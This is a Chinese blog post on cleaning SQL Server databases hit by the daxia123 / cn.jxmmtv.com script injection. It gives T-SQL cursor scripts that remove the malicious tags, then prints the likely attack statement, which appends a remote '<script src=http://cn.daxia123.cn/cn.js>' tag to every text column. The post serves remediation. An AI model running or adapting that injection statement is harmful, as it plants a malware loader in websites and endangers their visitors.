数据库被注入daxia123或cn.jxmmtv.com原因及解决办法.SQL语句执行即可

最新推荐文章于 2024-07-07 13:00:43 发布
最新推荐文章于 2024-07-07 13:00:43 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 数据库 sql table c

 

--去掉<script src=http://cn.daxia123.cn/cn.js></script>
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE
(cast(['+@C+'] as varchar(8000)),''<script src=http://cn.daxia123.cn/cn.js></script>'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

--去掉<script src=http://cn.jxmmtv.com/cn.js></script>


DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE
(cast(['+@C+'] as varchar(8000)),''<script src=http://cn.jxmmtv.com/cn.js></script>'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

数据被修改可能所使用语句: 正式数据库勿用.切记  ^_^

 

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM
(CONVERT(VARCHAR(4000),['+@C+']))+'' <script
src=http://cn.daxia123.cn/cn.js> </script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

angleoldhen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Autocorrected_Typing_Software.zip
11-13
这种软件通常用于提高用户输入文本的准确性和效率,它能实检测并修正用户在打字过程中可能出现的拼写错误、语法错误或格式错误。自动纠正功能在各种应用程序中都很常见,特别是在文字处理软件、电子邮件客户端和...
TheCode.zip
06-14
【Python数据结构】是编程学习中的重要组成部分,尤其在处理大量数据,高效的数据结构能够极大地提高代码的执行效率和可读性。Python内置了几种常用的数据结构,如列表(List)、元组(Tuple)、集合(Set)和字典...
SQL注入(宽字节注入、长字符截断
qq_28786023的博客
10-05 3008
本文仅记录SQL注入漏洞学习过程中的基本知识。 SQL注入漏洞是完全可以避免的安全问题。从其形成原因来看,就是**用户输入的数据(可能带有恶意)被SQL解释器当作代码执行,**从而获得更多数据库的信息或者获得更高的权限。从原理上来说,SQL注入可以分为两大类,数字型注入字符串注入;(《web安全深度剖析 张炳帅》)。 数字型注入 即输入类型为int类型,如ID,年龄,页码等。一般来说,数字型注入只存在于弱类型语句中,如:PHP,ASP,python,而对于C,java等强类型语言则不存在。弱类型语言会自
数据库注入daxia123cn.jxmmtv.com原因解决办法
02-02 131
--去掉<script src=http://cn.daxia123.cn/cn.js></script> DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b W...
数据库注入daxia123原因解决办法
weixin_34390996的博客
01-03 64
     近期,我管理的一个网站频繁被注入木马代码&lt;script src=http://cn.daxia123.cn/cn.js&gt;&lt;/script&gt;,在百度搜索这段代码,竟然可以搜到2万多的网站被注入了。这里希望大家能够帮忙人肉搜索出这个域名的所有者,进而找到那个坏蛋,揪出来痛打一顿。      查看IIS日志发现如下信息: 2009-01-01 01:27:35 W3...
cn.daxia123.cn/cn.js注入的解决方案
镜像之城
06-01 862
近期网站数据库中被注入了大量cn.daxia123.cn/cn.js的恶意脚本,不解的是我明明在程序做了防注入代码还能被轻易攻击。经查证发现该挂马将攻击代码用二进制编译成了类似于0x4445434C415245204054205641524348415228323535292C404的代码,防sql注入的代码无法识别,但sql server 会将此方式编译的代码还原为原来的样子这样就绕过了sq
网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法原因
weixin_34228387的博客
11-23 102
------------------------------------------------------------ 网站被黑kill_kk/xiaolu/daxia123.cn挂马解决办法原因 客户站,出现生成不了,被挂马。谈不上解决,只找到原因现状:各CMS系统无法生成,但是其它操作正常。生成一般提示“<' 附近有语法错”和“路径参数超过了最大允许长度。”受影响对象:采用MS...
最新最详细的配置Node.js环境教程
Li__Daxia的博客
03-14 3414
最新最详细的配置Node.js环境教程,已经将所有坑都踩了一遍!! 超级超级详细详细!!!
cn.daxia123.cn/cn.js挂马完美解决方案
weixin_30896511的博客
01-13 78
黑客商业化挂马越来越普遍,用GOOGLE搜索下<script src=http://cn.daxia123.cn/cn.js> </script>,约有844,000个网站被挂马。 最终经过安全伞终于抓到木马原型如下: ;dEcLaRe @S VaRcHaR(4000) SeT @s=cAsT(0x4445434C4152452040542056415...
在编写Java代码,我们如何改进连接数据库sql拼串语句来预防SQL注入
林大侠
08-04 439
参照-科普中国▪科学百科-sql注入定义 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 ☛应用场景:现...
信息安全_安全编码之SQL注入.pptx
08-14
在网络安全领域,SQL注入是一种常见的攻击手段,对数据库的安全构成重大威胁。本节将深入探讨SQL注入的原理、防范方法,以及如何通过安全编码实践来防止这类漏洞的发生。首先,让我们了解一下SQL注入的基础知识。 ...
网站数据库被挂js木马.pdf
10-11
1. **JavaScript注入**:攻击者通过在数据库中的特定字段注入JavaScript代码,这些代码通常是恶意的,会在用户访问受影响的网页执行。例如,文中提到的`<script src=http://cn.daxia123.cn/cn.js></script>`和`...
最全的电子技术网站最新汇总表整理.pdf
11-19
5. **大虾电子网** (http://www.daxia.com) - 单片机技术交流平台,拥有庞大的用户群体和丰富的技术资源。 6. **老古开发网** (http://www.laogu.com) - 专注于单片机、ARM、嵌入式系统的专业网站,提供大量的内容...
深入“daxia123 网站木马” 来自微软专家的SQL注入防范方法
松子儿的专栏
01-16 773
自去年下半年开始,很多网站被恶意代码说困扰,攻击者在动态网页的SQL数据库注入恶意的HTML 标签。这种脚本攻击行为在2008年第一季度开始加速传播,并继续影响有漏洞的Web应用。这些Web应用存在以下几点共性:使用ASP作为编程代码;使用SQL Server数据库;应用程序代码根据URI请求字符串生成动态SQL查询(http://consoto.com/widgets.asp?
流式数据库 RisingWave「Demo」:直播指标实分析
https://risingwave.com/
07-04 801
直播是目前最为流行的娱乐形式之一,本教程将分享如何使用开源流式数据库 RisingWave 监控直播指标。我们为本教程设置了一个演示集群,以便大家可以轻松尝试。
QT学习积累——方法参数加const和不加const的区别
Arya的博客,专注后端领域
07-03 1055
QT学习积累——方法参数加const和不加const的区别
JDBC (基础)
最新发布
weixin_51644244的博客
07-07 331
思考: java和sql是两种不同的编程语言。翻译程序---每个数据库厂商都提高了翻译软件-- -打包jar。---我们的java代码引入jar就可完成与数据库的沟通。Java :OOP 面向对象的编程对象。SQL: 结构化查询语言。
could not find a server with specified targetServerType
07-28
回答: 当出现"could not find a server with specified targetServerType"的错误,这通常意味着在连接数据库指定的服务器名称不正确。请确保正确指定了服务器名称,并验证该服务器是否已在sys.servers中注册。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值